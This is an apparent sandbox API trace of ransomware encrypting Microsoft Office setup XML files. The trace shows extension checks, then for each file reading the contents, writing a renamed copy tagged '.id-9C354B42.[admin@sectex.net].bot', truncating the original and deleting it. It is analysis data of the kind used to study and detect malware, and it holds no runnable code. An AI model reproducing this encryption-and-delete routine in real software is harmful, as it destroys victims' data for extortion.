	[0039.110] lstrlenW (lpString=".rar") returned 4
	[0039.111] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.111] lstrlenW (lpString=".bz2") returned 4
	[0039.111] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.111] lstrlenW (lpString=".7z") returned 3
	[0039.111] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.111] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98
	[0039.111] lstrlenW (lpString=".dbf") returned 4
	[0039.111] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.111] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98
	[0039.111] lstrlenW (lpString=".1cd") returned 4
	[0039.111] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.111] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98
	[0039.111] lstrlenW (lpString=".jpg") returned 4
	[0039.111] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.111] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98
	[0039.111] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98
	[0039.111] lstrlenW (lpString=".doc") returned 4
	[0039.111] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.111] lstrlenW (lpString=".docx") returned 5
	[0039.111] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1
	[0039.111] lstrlenW (lpString=".pdf") returned 4
	[0039.111] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.111] lstrlenW (lpString=".xls") returned 4
	[0039.111] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.111] lstrlenW (lpString=".xlsx") returned 5
	[0039.111] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1
	[0039.111] lstrlenW (lpString=".ppt") returned 4
	[0039.111] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.111] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98
	[0039.111] lstrlenW (lpString=".zip") returned 4
	[0039.111] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.111] lstrlenW (lpString=".rar") returned 4
	[0039.111] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.111] lstrlenW (lpString=".bz2") returned 4
	[0039.112] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.112] lstrlenW (lpString=".7z") returned 3
	[0039.112] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.112] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98
	[0039.112] lstrlenW (lpString=".dbf") returned 4
	[0039.112] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.112] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98
	[0039.112] lstrlenW (lpString=".1cd") returned 4
	[0039.112] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.112] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98
	[0039.112] lstrlenW (lpString=".jpg") returned 4
	[0039.112] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.112] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0039.112] lstrlenW (lpString="Proof.XML") returned 9
	[0039.112] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0039.112] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1458) returned 1
	[0039.112] CloseHandle (hObject=0x1cc) returned 1
	[0039.112] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml")) returned 0x20
	[0039.113] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0039.113] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0039.113] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.113] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.113] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0039.113] GetLastError () returned 0x0
	[0039.113] ReadFile (in: hFile=0x1cc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x5b2, lpOverlapped=0x0) returned 1
	[0039.114] WriteFile (in: hFile=0x190, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x5c0, lpOverlapped=0x0) returned 1
	[0039.115] ReadFile (in: hFile=0x1cc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0039.115] WriteFile (in: hFile=0x190, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0039.115] SetEndOfFile (hFile=0x190) returned 1
	[0039.115] CloseHandle (hObject=0x190) returned 1
	[0039.384] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.384] SetEndOfFile (hFile=0x1cc) returned 1
	[0039.385] CloseHandle (hObject=0x1cc) returned 1
	[0039.385] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0039.385] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml")) returned 1
	[0039.385] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98
	[0039.385] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98
	[0039.385] lstrlenW (lpString=".doc") returned 4
	[0039.386] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.386] lstrlenW (lpString=".docx") returned 5
	[0039.386] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1
	[0039.386] lstrlenW (lpString=".pdf") returned 4
	[0039.386] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.386] lstrlenW (lpString=".xls") returned 4
	[0039.386] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.386] lstrlenW (lpString=".xlsx") returned 5
	[0039.386] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1
	[0039.386] lstrlenW (lpString=".ppt") returned 4
	[0039.386] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.386] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98
	[0039.386] lstrlenW (lpString=".zip") returned 4
	[0039.386] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.386] lstrlenW (lpString=".rar") returned 4
	[0039.386] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.386] lstrlenW (lpString=".bz2") returned 4
	[0039.386] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.386] lstrlenW (lpString=".7z") returned 3
	[0039.386] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.386] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98
	[0039.386] lstrlenW (lpString=".dbf") returned 4
	[0039.386] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.386] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98
	[0039.386] lstrlenW (lpString=".1cd") returned 4
	[0039.386] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.386] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98
	[0039.386] lstrlenW (lpString=".jpg") returned 4
	[0039.386] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.386] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98
	[0039.386] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98
	[0039.386] lstrlenW (lpString=".doc") returned 4
	[0039.386] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.386] lstrlenW (lpString=".docx") returned 5
	[0039.387] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1
	[0039.387] lstrlenW (lpString=".pdf") returned 4
	[0039.387] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.387] lstrlenW (lpString=".xls") returned 4
	[0039.387] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.387] lstrlenW (lpString=".xlsx") returned 5
	[0039.387] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1
	[0039.387] lstrlenW (lpString=".ppt") returned 4
	[0039.387] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98
	[0039.387] lstrlenW (lpString=".zip") returned 4
	[0039.387] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.387] lstrlenW (lpString=".rar") returned 4
	[0039.387] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.387] lstrlenW (lpString=".bz2") returned 4
	[0039.387] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.387] lstrlenW (lpString=".7z") returned 3
	[0039.387] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98
	[0039.387] lstrlenW (lpString=".dbf") returned 4
	[0039.387] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98
	[0039.387] lstrlenW (lpString=".1cd") returned 4
	[0039.387] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98
	[0039.387] lstrlenW (lpString=".jpg") returned 4
	[0039.387] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.387] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0039.387] lstrlenW (lpString="SETUP.XML") returned 9
	[0039.387] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0039.679] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=5884) returned 1
	[0039.679] CloseHandle (hObject=0x1c0) returned 1
	[0039.689] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml")) returned 0x20
	[0039.689] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0039.689] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0039.689] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.690] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.690] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0039.905] GetLastError () returned 0x0
	[0039.905] ReadFile (in: hFile=0x190, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x16fc, lpOverlapped=0x0) returned 1
	[0039.941] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x1700, lpOverlapped=0x0) returned 1
	[0039.942] ReadFile (in: hFile=0x190, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0039.942] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0039.942] SetEndOfFile (hFile=0x184) returned 1
	[0039.942] CloseHandle (hObject=0x184) returned 1
	[0039.943] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.943] SetEndOfFile (hFile=0x190) returned 1
	[0039.944] CloseHandle (hObject=0x190) returned 1
	[0039.944] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0039.945] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml")) returned 1
	[0039.945] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104
	[0039.945] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104
	[0039.945] lstrlenW (lpString=".doc") returned 4
	[0039.945] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.945] lstrlenW (lpString=".docx") returned 5
	[0039.945] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0039.945] lstrlenW (lpString=".pdf") returned 4
	[0039.945] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.945] lstrlenW (lpString=".xls") returned 4
	[0039.945] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.945] lstrlenW (lpString=".xlsx") returned 5
	[0039.945] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0039.945] lstrlenW (lpString=".ppt") returned 4
	[0039.945] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.945] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104
	[0039.945] lstrlenW (lpString=".zip") returned 4
	[0039.945] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.945] lstrlenW (lpString=".rar") returned 4
	[0039.945] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.945] lstrlenW (lpString=".bz2") returned 4
	[0039.945] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.945] lstrlenW (lpString=".7z") returned 3
	[0039.945] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.945] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104
	[0039.945] lstrlenW (lpString=".dbf") returned 4
	[0039.945] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.946] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104
	[0039.946] lstrlenW (lpString=".1cd") returned 4
	[0039.946] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.946] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104
	[0039.946] lstrlenW (lpString=".jpg") returned 4
	[0039.946] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.946] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104
	[0039.946] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104
	[0039.946] lstrlenW (lpString=".doc") returned 4
	[0039.946] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.946] lstrlenW (lpString=".docx") returned 5
	[0039.946] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0039.946] lstrlenW (lpString=".pdf") returned 4
	[0039.946] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.946] lstrlenW (lpString=".xls") returned 4
	[0039.946] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.946] lstrlenW (lpString=".xlsx") returned 5
	[0039.946] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0039.946] lstrlenW (lpString=".ppt") returned 4
	[0039.946] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.946] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104
	[0039.946] lstrlenW (lpString=".zip") returned 4
	[0039.946] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.946] lstrlenW (lpString=".rar") returned 4
	[0039.946] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.946] lstrlenW (lpString=".bz2") returned 4
	[0039.946] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.946] lstrlenW (lpString=".7z") returned 3
	[0039.946] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.946] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104
	[0039.946] lstrlenW (lpString=".dbf") returned 4
	[0039.946] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.946] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104
	[0039.946] lstrlenW (lpString=".1cd") returned 4
	[0039.946] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.947] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104
	[0039.947] lstrlenW (lpString=".jpg") returned 4
	[0039.947] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.947] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0039.947] lstrlenW (lpString="SETUP.XML") returned 9
	[0039.947] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0039.953] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=2424) returned 1
	[0039.953] CloseHandle (hObject=0x184) returned 1
	[0039.953] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml")) returned 0x20
	[0039.953] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0039.953] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0039.954] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.954] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.954] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4
	[0039.954] GetLastError () returned 0x0
	[0039.954] ReadFile (in: hFile=0x184, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x978, lpOverlapped=0x0) returned 1
	[0040.000] WriteFile (in: hFile=0x1a4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x980, lpOverlapped=0x0) returned 1
	[0040.001] ReadFile (in: hFile=0x184, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0040.001] WriteFile (in: hFile=0x1a4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0040.001] SetEndOfFile (hFile=0x1a4) returned 1
	[0040.114] CloseHandle (hObject=0x1a4) returned 1
	[0040.115] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.115] SetEndOfFile (hFile=0x184) returned 1
	[0040.116] CloseHandle (hObject=0x184) returned 1
	[0040.116] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0040.116] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml")) returned 1
